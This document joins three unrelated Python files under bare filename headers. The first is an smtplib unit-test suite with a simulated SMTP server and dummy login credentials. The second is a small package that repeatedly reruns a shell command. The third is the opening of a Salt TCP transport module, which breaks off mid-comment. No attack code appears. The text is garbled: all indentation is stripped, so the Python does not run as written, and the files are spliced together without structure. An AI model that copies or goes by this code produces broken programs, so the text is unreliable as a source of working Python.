test_smtplib.py
import asyncore
import email.mime.text
import email.utils
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import unittest
from test import support, mock_socket
try:
import threading
except ImportError:
threading = None
HOST = support.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertTrue(mock_socket.getdefaulttimeout() is None)
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(smtp.sock.gettimeout() is None)
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'Ok')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'Ok')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testNotImplemented(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, b'Error: command "EHLO" not implemented')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testVRFY(self):
# VRFY isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, b'Error: command "VRFY" not implemented')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), b'Error: command "HELP" not implemented')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# The Sender header overrides From when choosing the envelope sender
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Bcc and Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
def tearDown(self):
smtplib.socket = socket
def testNotConnected(self):
# Test various operations on an unconnected SMTP object; they should
# all raise SMTPServerDisconnected, since the object has no socket to
# send on yet.
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises socket.error
self.assertRaises(mock_socket.error, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(mock_socket.error, smtplib.SMTP,
"localhost:bogus")
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_auth_credentials = {
'login': 'TXIuQUBzb21ld2hlcmUuY29t',
'plain': 'AE1yLkFAc29tZXdoZXJlLmNvbQBzb21lcGFzc3dvcmQ=',
'cram-md5': ('TXIUQUBZB21LD2HLCMUUY29TIDG4OWQ0MJ'
'KWZGQ4ODNMNDA4NTGXMDRLZWMYZJDMODG1'),
}
sim_auth_login_password = 'C29TZXBHC3N3B3JK'
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class SimSMTPChannel(smtpd.SMTPChannel):
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_AUTH(self, arg):
if arg.strip().lower()=='cram-md5':
self.push('334 {}'.format(sim_cram_md5_challenge))
return
mech, auth = arg.split()
mech = mech.lower()
if mech not in sim_auth_credentials:
self.push('504 auth type unimplemented')
return
if mech == 'plain' and auth==sim_auth_credentials['plain']:
self.push('235 plain auth ok')
elif mech=='login' and auth==sim_auth_credentials['login']:
self.push('334 Password:')
else:
self.push('550 No access for you!')
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(self._extra_features,
self, conn, addr)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for email, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(email)),
"ascii"))
self.assertEqual(smtp.vrfy(email), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
expected_auth_ok = (235, b'plain auth ok')
self.assertEqual(smtp.login(sim_auth[0], sim_auth[1]), expected_auth_ok)
smtp.close()
# SimSMTPChannel doesn't fully support LOGIN or CRAM-MD5 auth because they
# require a synchronous read to obtain the credentials...so instead smtpd
# sees the credential sent by smtplib's login method as an unknown command,
# which results in smtplib raising an auth error. Fortunately the error
# message contains the encoded credential, so we can partially check that it
# was generated correctly (partially, because the 'word' is uppercased in
# the error message).
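# As a rough illustration (not part of the original test data), the expected
# substring is just the uppercased base64 encoding of the simulated password:
#   import base64
#   base64.b64encode(b'somepassword').decode('ascii').upper()  # -> 'C29TZXBHC3N3B3JK'
# so finding it in the error message partially verifies the credential that
# smtplib generated.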
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_login_password, str(err))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_credentials['cram-md5'], str(err))
smtp.close()
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(GeneralTests, DebuggingServerTests,
NonConnectingTests,
BadHELOServerTests, SMTPSimTests)
if __name__ == '__main__':
test_main()
__init__.py
"""restartsh - """
__version__ = '0.1.0'
__author__ = 'fx-kirin <fx.kirin@gmail.com>'
__all__ = []
import logging
import threading
import time
import delegator
logger = logging.getLogger('restartsh')
def restart_thread(cmd, flag, interval=0):
while not flag.is_set():
logger.info('Start [CMD]:%s', cmd)
result = delegator.run(cmd)
logger.info('Finished [CMD]:%s', cmd)
if result.ok:
logger.info('[OUT]%s', result.out)
else:
logger.error('[ERR]%s', result.err)
if interval > 0:
logger.info('Sleep %d sec [CMD]', interval)
time.sleep(interval)
logger.info("Close by exit_flag")
def restarter(cmd, interval=0):
flag = threading.Event()
thread = threading.Thread(target=restart_thread, args=(cmd, flag, interval))
thread.daemon = True
thread.start()
thread.exit_flag = flag
return thread
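# A minimal usage sketch (illustrative only; assumes a POSIX shell and that the
# package is importable as 'restartsh'):
#
#   import time
#   import restartsh
#
#   thread = restartsh.restarter('echo hello', interval=1)
#   time.sleep(5)              # let the command run and restart a few times
#   thread.exit_flag.set()     # stop the loop before the next restart
#   thread.join()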
tcp.py
# -*- coding: utf-8 -*-
'''
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import errno
import logging
import os
import socket
import sys
import time
import threading
import traceback
import weakref
# Import Salt Libs
import salt.crypt
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.files
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.payload
import salt.exceptions
import salt.transport.frame
import salt.transport.ipc
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.ext.six.moves import queue # pylint: disable=import-error
from salt.exceptions import SaltReqTimeoutError, SaltClientError
from salt.transport import iter_transport_opts
# Import Tornado Libs
import tornado
import tornado.tcpserver
import tornado.gen
import tornado.concurrent
import tornado.tcpclient
import tornado.netutil
import tornado.iostream
# pylint: disable=import-error,no-name-in-module
if six.PY2:
import urlparse
else:
import urllib.parse as urlparse
# pylint: enable=import-error,no-name-in-module
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if six.PY3 and salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import tornado.util
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
'''
Ensure that TCP keepalives are set for the socket.
'''
if hasattr(socket, 'SO_KEEPALIVE'):
if opts.get('tcp_keepalive', False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, 'SOL_TCP'):
if hasattr(socket, 'TCP_KEEPIDLE'):
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE,
int(tcp_keepalive_idle))
if hasattr(socket, 'TCP_KEEPCNT'):
tcp_keepalive_cnt = opts.get('tcp_keepalive_cnt', -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT,
int(tcp_keepalive_cnt))
if hasattr(socket, 'TCP_KEEPINTVL'):
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl))
if hasattr(socket, 'SIO_KEEPALIVE_VALS'):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
